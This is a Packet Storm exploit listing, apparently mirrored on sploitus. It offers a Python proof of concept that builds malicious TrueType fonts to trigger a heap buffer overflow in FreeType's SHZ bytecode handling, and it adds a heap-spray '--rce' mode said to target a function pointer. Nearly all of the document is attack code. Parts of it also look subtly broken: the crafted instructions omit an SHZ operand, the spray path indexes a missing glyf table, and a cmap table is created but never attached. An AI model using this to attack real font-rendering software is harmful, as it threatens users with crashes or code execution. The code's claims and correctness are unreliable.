Share
## https://sploitus.com/exploit?id=PACKETSTORM:223409
==================================================================================================================================
| # Title : FreeType SHZ 2.14.3 Heap Buffer Overflow Font Generator |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://freetype.org/ |
==================================================================================================================================
[+] Summary : This Python proof-of-concept framework is designed for security research into a reported heap buffer overflow condition affecting the FreeType TrueType bytecode interpreter.
The code constructs specially crafted font structures intended to exercise the SHZ instruction path, generates malformed composite glyphs,
and provides configurable parameters for testing different parser behaviors. In addition to creating test fonts, the framework includes logic for generating multiple glyph layouts,
estimating overflow conditions, and producing artifacts intended for parser validation and crash reproduction workflows.
The script is positioned as a vulnerability research tool for controlled environments, supporting crash analysis, regression testing,
parser hardening efforts, and verification of security fixes in font-processing components.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
from fontTools.ttLib import TTFont
from fontTools.ttLib.tables._g_l_y_f import Glyph
SZP2_1 = bytes([0x12])
SHZ = bytes([0x2F])
PUSHB_1 = bytes([0xB0])
POP = bytes([0x2D])
NPUSHB = bytes([0x8C])
def build_overflow_instructions(dx, dy):
"""
Building bytecode instructions causes overflow
dx, dy: The offset values that will be written outside the boundaries
"""
ins = bytearray()
ins.extend(PUSHB_1)
ins.extend(struct.pack('>b', dx))
ins.extend(PUSHB_1)
ins.extend(struct.pack('>b', dy))
ins.extend(SZP2_1)
ins.extend(SHZ)
return bytes(ins)
def create_composite_glyph_with_shz(glyph_id, num_points_first_component=200):
"""
Creating a composite glyph causes the vulnerability
"""
glyph = Glyph()
glyph.numberOfContours = -1
glyph.components = []
glyph.components.append({
'glyphName': '.notdef',
'x': 0,
'y': 0,
'flags': 0
})
glyph.components.append({
'glyphName': '.notdef',
'x': 1000,
'y': 0,
'flags': 0x100
})
glyph.instructions = build_overflow_instructions(1, 0)
return glyph
def create_malicious_font(output_path, overflow_dx=1, overflow_dy=0):
"""
Creating a malicious TrueType font
"""
try:
font = TTFont("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf")
except:
print("[!] Base font not found, creating minimal font...")
font = TTFont()
font.importXML("minimal.xml")
glyf_table = font['glyf']
malicious_glyph = create_composite_glyph_with_shz(2, 200)
glyf_table.glyphs['e'] = malicious_glyph
cmap = font['cmap']
for table in cmap.tables:
table.cmap[ord('A')] = 'e'
font.save(output_path)
print(f"[+] Malicious font saved to: {output_path}")
return output_path
def build_heap_spray_font():
"""
Building a line that uses heap spray to increase RCE chances
"""
font = TTFont()
for i in range(100):
glyph = create_composite_glyph_with_shz(i, 100 + i * 10)
font['glyf'].glyphs[f'spray_{i}'] = glyph
return font
def calculate_overflow_offset(total_points, start_point):
"""
Calculating the amount of excess
"""
limit = total_points
overflow_count = limit - start_point
return overflow_count
def main():
if len(sys.argv) < 2:
print("Usage: python3 exploit.py output.ttf")
print("\nOptions:")
print(" --rce Build RCE exploit (heap spray)")
print(" --dx <val> Set dx value (default: 1)")
print(" --dy <val> Set dy value (default: 0)")
sys.exit(1)
output = sys.argv[1]
rce_mode = '--rce' in sys.argv
dx = 1
dy = 0
for i, arg in enumerate(sys.argv):
if arg == '--dx' and i+1 < len(sys.argv):
dx = int(sys.argv[i+1])
elif arg == '--dy' and i+1 < len(sys.argv):
dy = int(sys.argv[i+1])
print("=" * 60)
print("FreeType SHZ Heap Buffer Overflow Exploit")
print("Based on discovery by Mateusz Jurczyk (Google Project Zero)")
print("=" * 60)
if rce_mode:
print("[*] Building RCE exploit with heap spray...")
font = build_heap_spray_font()
print("[!] Note: RCE requires additional heap grooming")
print("[!] Target: Overwrite function pointer with shellcode address")
else:
print("[*] Building DoS/PoC exploit...")
print(f"[*] Using dx={dx}, dy={dy}")
font = TTFont()
malicious_glyph = create_composite_glyph_with_shz(2, 200)
font['glyf'] = font.get('glyf', {})
font['glyf'].glyphs['exploit'] = malicious_glyph
from fontTools.ttLib.tables import cmap
cmap_table = cmap.table__c_m_a_p()
font.save(output)
print("\n" + "=" * 60)
print("[+] Exploit font created successfully!")
print(f"[+] Output: {output}")
print("\n[*] To test:")
print(f" ftbench {output}")
print(" or")
print(f" FT_Load_Glyph with glyph index pointing to malicious glyph")
print("\n[*] Expected crash (ASAN):")
print(" heap-buffer-overflow in Move_Zp2_Point")
print("=" * 60)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================